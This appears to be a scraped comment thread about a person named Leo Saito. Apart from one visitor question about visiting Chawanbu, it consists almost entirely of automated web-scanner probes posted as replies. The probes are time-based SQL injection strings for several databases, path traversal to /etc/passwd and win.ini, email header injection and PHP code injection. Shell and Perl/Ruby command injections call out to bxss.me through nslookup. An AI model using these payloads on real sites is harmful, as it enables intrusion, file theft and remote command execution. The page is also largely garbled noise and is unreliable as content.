Yap!
re: Leo Saito
maMPKxXa
re: Leo Saito
1*
re: Leo Saito
1*
re: Leo Saito
1*
re: Leo Saito
1*
re: Leo Saito
-1 OR 2+711-711-1=0+0+0+1
re: Leo Saito
-1 OR 3+711-711-1=0+0+0+1
re: Leo Saito
if(now()=sysdate(),sleep(15),0)
re: Leo Saito
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Leo Saito
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Leo Saito
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Leo Saito
-1; waitfor delay '0:0:15' --
re: Leo Saito
-1); waitfor delay '0:0:15' --
re: Leo Saito
1 waitfor delay '0:0:15' --
re: Leo Saito
CZdTsVGT'; waitfor delay '0:0:15' --
re: Leo Saito
-5 OR 402=(SELECT 402 FROM PG_SLEEP(15))--
re: Leo Saito
-5) OR 887=(SELECT 887 FROM PG_SLEEP(15))--
re: Leo Saito
-1)) OR 632=(SELECT 632 FROM PG_SLEEP(15))--
re: Leo Saito
Iv8IG2UR' OR 300=(SELECT 300 FROM PG_SLEEP(15))--
re: Leo Saito
WJNC6eie') OR 417=(SELECT 417 FROM PG_SLEEP(15))--
re: Leo Saito
BS0IUpYd')) OR 490=(SELECT 490 FROM PG_SLEEP(15))--
re: Leo Saito
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Leo Saito
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Leo Saito
'||(select 1 from (select pg_sleep(15))x)||'
re: Leo Saito
''||(select 1 from (select pg_sleep(15))x)||''
re: Leo Saito
1'"
re: Leo Saito
@@UX5M7
re: Leo Saito
fsNJrhLr
re: Leo Saito
1*
re: Leo Saito
1*
re: Leo Saito
1*
re: Leo Saito
1*
re: Leo Saito
-1 OR 2+371-371-1=0+0+0+1
re: Leo Saito
-1 OR 3+371-371-1=0+0+0+1
re: Leo Saito
if(now()=sysdate(),sleep(15),0)
re: Leo Saito
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Leo Saito
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Leo Saito
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Leo Saito
-1; waitfor delay '0:0:15' --
re: Leo Saito
-1); waitfor delay '0:0:15' --
re: Leo Saito
1 waitfor delay '0:0:15' --
re: Leo Saito
t9DJ40ya'; waitfor delay '0:0:15' --
re: Leo Saito
-5 OR 467=(SELECT 467 FROM PG_SLEEP(15))--
re: Leo Saito
-5) OR 377=(SELECT 377 FROM PG_SLEEP(15))--
re: Leo Saito
-1)) OR 37=(SELECT 37 FROM PG_SLEEP(15))--
re: Leo Saito
yWKhoQ0a' OR 670=(SELECT 670 FROM PG_SLEEP(15))--
re: Leo Saito
OvuPO2JX') OR 881=(SELECT 881 FROM PG_SLEEP(15))--
re: Leo Saito
z1jrZGKH')) OR 724=(SELECT 724 FROM PG_SLEEP(15))--
re: Leo Saito
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Leo Saito
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Leo Saito
'||(select 1 from (select pg_sleep(15))x)||'
re: Leo Saito
''||(select 1 from (select pg_sleep(15))x)||''
re: Leo Saito
1'"
re: Leo Saito
@@O7iw2
re: Leo Saito
1PI80GKLO
re: Leo Saito
response.write(9923414*9458159)
re: Leo Saito
'+response.write(9923414*9458159)+'
re: Leo Saito
"+response.write(9923414*9458159)+"
re: Leo Saito
%0abcc:074625.67-10282.67.f4cfe.19990.2@bxss.me
re: Leo Saito
to@example.com>%0d%0abcc:074625.67-10283.67.f4cfe.19990.2@bxss.me
re: Leo Saito
../../../../../../../../../../../../../../etc/passwd
re: Leo Saito
../../../../../../../../../../../../../../windows/win.ini
re: Leo Saito
file:///etc/passwd
re: Leo Saito
../../../../../../../../../../../../../../../proc/version
re: Leo Saito
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: Leo Saito
../../../../../../../../../../etc/passwd%00.jpg
re: Leo Saito
echo ledfry$()\ rmlply\nz^xyu||a #' &echo ledfry$()\ rmlply\nz^xyu||a #|" &echo ledfry$()\ rmlply\nz^xyu||a #
re: Leo Saito
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: Leo Saito
&echo eanrdd$()\ zshrvr\nz^xyu||a #' &echo eanrdd$()\ zshrvr\nz^xyu||a #|" &echo eanrdd$()\ zshrvr\nz^xyu||a #
re: Leo Saito
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: Leo Saito
|echo otwzqj$()\ ccefid\nz^xyu||a #' |echo otwzqj$()\ ccefid\nz^xyu||a #|" |echo otwzqj$()\ ccefid\nz^xyu||a #
re: Leo Saito
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: Leo Saito
(nslookup hitfmmpejbhpfbc11c.bxss.me||perl -e "gethostbyname('hitfmmpejbhpfbc11c.bxss.me')")
re: Leo Saito
/etc/passwd
re: Leo Saito
$(nslookup hitjplyfmngqb55c13.bxss.me||perl -e "gethostbyname('hitjplyfmngqb55c13.bxss.me')")
re: Leo Saito
%2fetc%2fpasswd
re: Leo Saito
<esi:include src="http://bxss.me/rpb.png"/>
re: Leo Saito
&nslookup hitkynvxinfptcb872.bxss.me&'\"`0&nslookup hitkynvxinfptcb872.bxss.me&`'
re: Leo Saito
/.././.././.././.././.././.././.././../etc/./passwd%00
re: Leo Saito
&(nslookup hithvopacegxo5474c.bxss.me||perl -e "gethostbyname('hithvopacegxo5474c.bxss.me')")&'\"`0&(nslookup hithvopacegxo5474c.bxss.me||perl -e "gethostbyname('hithvopacegxo5474c.bxss.me')")&`'
re: Leo Saito
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: Leo Saito
|(nslookup hitmsmazqszdo567b4.bxss.me||perl -e "gethostbyname('hitmsmazqszdo567b4.bxss.me')")
re: Leo Saito
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: Leo Saito
${9999683+9999719}
re: Leo Saito
`(nslookup hitudfftfzlsw810b4.bxss.me||perl -e "gethostbyname('hitudfftfzlsw810b4.bxss.me')")`
re: Leo Saito
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: Leo Saito
;(nslookup hitxfcjlykyvj1a98c.bxss.me||perl -e "gethostbyname('hitxfcjlykyvj1a98c.bxss.me')")|(nslookup hitxfcjlykyvj1a98c.bxss.me||perl -e "gethostbyname('hitxfcjlykyvj1a98c.bxss.me')")&(nslookup hitxfcjlykyvj1a98c.bxss.me||perl -e "gethostbyname('hitxfcjlykyvj1a98c.bxss.me')")
re: Leo Saito
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: Leo Saito
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: Leo Saito
file:///etc/passwd
re: Leo Saito
/\../\../\../\../\../\../\../etc/passwd
re: Leo Saito
/WEB-INF/web.xml
re: Leo Saito
C:\WINDOWS\system32\drivers\etc\hosts
re: Leo Saito
../../../../../../../../../../windows/win.ini%00.jpg
re: Leo Saito
)
re: Leo Saito
/../../../../../../../../../../boot.ini
re: Leo Saito
!(()&&!|*|*|
re: Leo Saito
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: Leo Saito
^(#$!@#$)(()))******
re: Leo Saito
..\..\..\..\..\..\..\..\windows\win.ini
re: Leo Saito
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: Leo Saito
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: Leo Saito
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: Leo Saito
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: Leo Saito
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: Leo Saito
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: Leo Saito
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: Leo Saito
Http://bxss.me/t/fit.txt
re: Leo Saito
WEB-INF/web.xml
re: Leo Saito
http://bxss.me/t/fit.txt%3F.jpg
re: Leo Saito
WEB-INF\web.xml
re: Leo Saito
/etc/shells
re: Leo Saito
c:/windows/win.ini
re: Leo Saito
bxss.me
re: Leo Saito
'.gethostbyname(lc('hitpy'.'avarpogr002cb.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(100).chr(73).chr(108).chr(74).'
re: Leo Saito
".gethostbyname(lc("hitso"."wjykradm657ce.bxss.me."))."A".chr(67).chr(hex("58")).chr(112).chr(76).chr(120).chr(79)."
re: Leo Saito
HttP://bxss.me/t/xss.html?%00
re: Leo Saito
bxss.me/t/xss.html?%00
re: Leo Saito
"+"A".concat(70-3).concat(22*4).concat(108).concat(72).concat(108).concat(78)+(require"socket"
Socket.gethostbyname("hitoz"+"rmxzktjda750c.bxss.me.")[3].to_s)+"
re: Leo Saito
'+'A'.concat(70-3).concat(22*4).concat(119).concat(85).concat(109).concat(89)+(require'socket'
Socket.gethostbyname('hitcz'+'qzxmzmphf9b80.bxss.me.')[3].to_s)+'
re: Leo Saito
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: Leo Saito
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: Leo Saito
';print(md5(31337));$a='
re: Leo Saito
";print(md5(31337));$a="
re: Leo Saito
'"
re: Leo Saito
${@print(md5(31337))}
re: Leo Saito
<!--
re: Leo Saito
${@print(md5(31337))}\
re: Leo Saito
'.print(md5(31337)).'
re: Leo Saito
1
re: Leo Saito
1
re: Leo Saito
-1 OR 2+212-212-1=0+0+0+1 --
re: Leo Saito
-1 OR 3+212-212-1=0+0+0+1 --
re: Leo Saito
-1 OR 2+505-505-1=0+0+0+1
re: Leo Saito
-1 OR 3+505-505-1=0+0+0+1
re: Leo Saito
-1' OR 2+331-331-1=0+0+0+1 --
re: Leo Saito
-1' OR 3+331-331-1=0+0+0+1 --
re: Leo Saito
-1' OR 2+889-889-1=0+0+0+1 or 'ET7WRnOt'='
re: Leo Saito
-1' OR 3+889-889-1=0+0+0+1 or 'ET7WRnOt'='
re: Leo Saito
-1" OR 2+673-673-1=0+0+0+1 --
re: Leo Saito
-1" OR 3+673-673-1=0+0+0+1 --
re: Leo Saito
if(now()=sysdate(),sleep(15),0)
re: Leo Saito
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Leo Saito
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Leo Saito
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Leo Saito
-1; waitfor delay '0:0:15' --
re: Leo Saito
-1); waitfor delay '0:0:15' --
re: Leo Saito
1 waitfor delay '0:0:15' --
re: Leo Saito
HTht6uoL'; waitfor delay '0:0:15' --
re: Leo Saito
-5 OR 983=(SELECT 983 FROM PG_SLEEP(15))--
re: Leo Saito
-5) OR 780=(SELECT 780 FROM PG_SLEEP(15))--
re: Leo Saito
-1)) OR 677=(SELECT 677 FROM PG_SLEEP(15))--
re: Leo Saito
wKs6QRNW' OR 364=(SELECT 364 FROM PG_SLEEP(15))--
re: Leo Saito
ORxfLUFi') OR 136=(SELECT 136 FROM PG_SLEEP(15))--
re: Leo Saito
5tOwyjNk')) OR 863=(SELECT 863 FROM PG_SLEEP(15))--
re: Leo Saito
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Leo Saito
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Leo Saito
'||(select 1 from (select pg_sleep(15))x)||'
re: Leo Saito
''||(select 1 from (select pg_sleep(15))x)||''
re: Leo Saito
1'"
re: Leo Saito
@@HvlTs
re: Leo Saito
1
re: Leo Saito
1
re: Leo Saito
1
Hi Saito San. Regarding Chawanbu, is walk in possible or do I need a reservation to visit?
re: paul_paulpiwat
YsoRCOVA
re: paul_paulpiwat
1*
re: paul_paulpiwat
1*
re: paul_paulpiwat
1*
re: paul_paulpiwat
1*
re: paul_paulpiwat
-1 OR 2+219-219-1=0+0+0+1
re: paul_paulpiwat
-1 OR 3+219-219-1=0+0+0+1
re: paul_paulpiwat
if(now()=sysdate(),sleep(15),0)
re: paul_paulpiwat
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: paul_paulpiwat
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: paul_paulpiwat
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: paul_paulpiwat
-1; waitfor delay '0:0:15' --
re: paul_paulpiwat
-1); waitfor delay '0:0:15' --
re: paul_paulpiwat
1 waitfor delay '0:0:15' --
re: paul_paulpiwat
PGMbAnrz'; waitfor delay '0:0:15' --
re: paul_paulpiwat
-5 OR 593=(SELECT 593 FROM PG_SLEEP(15))--
re: paul_paulpiwat
-5) OR 486=(SELECT 486 FROM PG_SLEEP(15))--
re: paul_paulpiwat
-1)) OR 693=(SELECT 693 FROM PG_SLEEP(15))--
re: paul_paulpiwat
0qgRgQJe' OR 502=(SELECT 502 FROM PG_SLEEP(15))--
re: paul_paulpiwat
Hwa01nnQ') OR 804=(SELECT 804 FROM PG_SLEEP(15))--
re: paul_paulpiwat
kJJmVKgL')) OR 888=(SELECT 888 FROM PG_SLEEP(15))--
re: paul_paulpiwat
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: paul_paulpiwat
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: paul_paulpiwat
'||(select 1 from (select pg_sleep(15))x)||'
re: paul_paulpiwat
''||(select 1 from (select pg_sleep(15))x)||''
re: paul_paulpiwat
1'"
re: paul_paulpiwat
@@MFhQQ
re: paul_paulpiwat
1woLsOmz
re: paul_paulpiwat
1*
re: paul_paulpiwat
1*
re: paul_paulpiwat
1*
re: paul_paulpiwat
1*
re: paul_paulpiwat
-1 OR 2+580-580-1=0+0+0+1
re: paul_paulpiwat
-1 OR 3+580-580-1=0+0+0+1
re: paul_paulpiwat
if(now()=sysdate(),sleep(15),0)
re: paul_paulpiwat
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: paul_paulpiwat
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: paul_paulpiwat
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: paul_paulpiwat
-1; waitfor delay '0:0:15' --
re: paul_paulpiwat
-1); waitfor delay '0:0:15' --
re: paul_paulpiwat
1 waitfor delay '0:0:15' --
re: paul_paulpiwat
EKiBm0mL'; waitfor delay '0:0:15' --
re: paul_paulpiwat
-5 OR 379=(SELECT 379 FROM PG_SLEEP(15))--
re: paul_paulpiwat
-5) OR 459=(SELECT 459 FROM PG_SLEEP(15))--
re: paul_paulpiwat
-1)) OR 674=(SELECT 674 FROM PG_SLEEP(15))--
re: paul_paulpiwat
bYrQ1bN6' OR 30=(SELECT 30 FROM PG_SLEEP(15))--
re: paul_paulpiwat
VoOpYwME') OR 126=(SELECT 126 FROM PG_SLEEP(15))--
re: paul_paulpiwat
UAN2bRcR')) OR 131=(SELECT 131 FROM PG_SLEEP(15))--
re: paul_paulpiwat
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: paul_paulpiwat
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: paul_paulpiwat
'||(select 1 from (select pg_sleep(15))x)||'
re: paul_paulpiwat
''||(select 1 from (select pg_sleep(15))x)||''
re: paul_paulpiwat
1'"
re: paul_paulpiwat
@@yM8zC
re: paul_paulpiwat
1kAbCxBCO
re: paul_paulpiwat
response.write(9584869*9972309)
re: paul_paulpiwat
'+response.write(9584869*9972309)+'
re: paul_paulpiwat
"+response.write(9584869*9972309)+"
re: paul_paulpiwat
%0abcc:074625.67-10271.67.fe9bd.19990.2@bxss.me
re: paul_paulpiwat
to@example.com>%0d%0abcc:074625.67-10272.67.fe9bd.19990.2@bxss.me
re: paul_paulpiwat
../../../../../../../../../../../../../../etc/passwd
re: paul_paulpiwat
../../../../../../../../../../../../../../windows/win.ini
re: paul_paulpiwat
<esi:include src="http://bxss.me/rpb.png"/>
re: paul_paulpiwat
file:///etc/passwd
re: paul_paulpiwat
../../../../../../../../../../../../../../../proc/version
re: paul_paulpiwat
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: paul_paulpiwat
${9999725+10000061}
re: paul_paulpiwat
../../../../../../../../../../etc/passwd%00.jpg
re: paul_paulpiwat
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: paul_paulpiwat
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: paul_paulpiwat
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: paul_paulpiwat
/etc/passwd
re: paul_paulpiwat
echo ceeydq$()\ fypwgy\nz^xyu||a #' &echo ceeydq$()\ fypwgy\nz^xyu||a #|" &echo ceeydq$()\ fypwgy\nz^xyu||a #
re: paul_paulpiwat
%2fetc%2fpasswd
re: paul_paulpiwat
&echo fezwmr$()\ giwcrp\nz^xyu||a #' &echo fezwmr$()\ giwcrp\nz^xyu||a #|" &echo fezwmr$()\ giwcrp\nz^xyu||a #
re: paul_paulpiwat
/.././.././.././.././.././.././.././../etc/./passwd%00
re: paul_paulpiwat
|echo tzpjzx$()\ tasznq\nz^xyu||a #' |echo tzpjzx$()\ tasznq\nz^xyu||a #|" |echo tzpjzx$()\ tasznq\nz^xyu||a #
re: paul_paulpiwat
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: paul_paulpiwat
)
re: paul_paulpiwat
(nslookup hitawwubkxrpoab6fc.bxss.me||perl -e "gethostbyname('hitawwubkxrpoab6fc.bxss.me')")
re: paul_paulpiwat
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: paul_paulpiwat
!(()&&!|*|*|
re: paul_paulpiwat
$(nslookup hitgiqqxrccgj1a4ba.bxss.me||perl -e "gethostbyname('hitgiqqxrccgj1a4ba.bxss.me')")
re: paul_paulpiwat
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: paul_paulpiwat
^(#$!@#$)(()))******
re: paul_paulpiwat
&nslookup hitnzqnkdhrdcd2451.bxss.me&'\"`0&nslookup hitnzqnkdhrdcd2451.bxss.me&`'
re: paul_paulpiwat
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: paul_paulpiwat
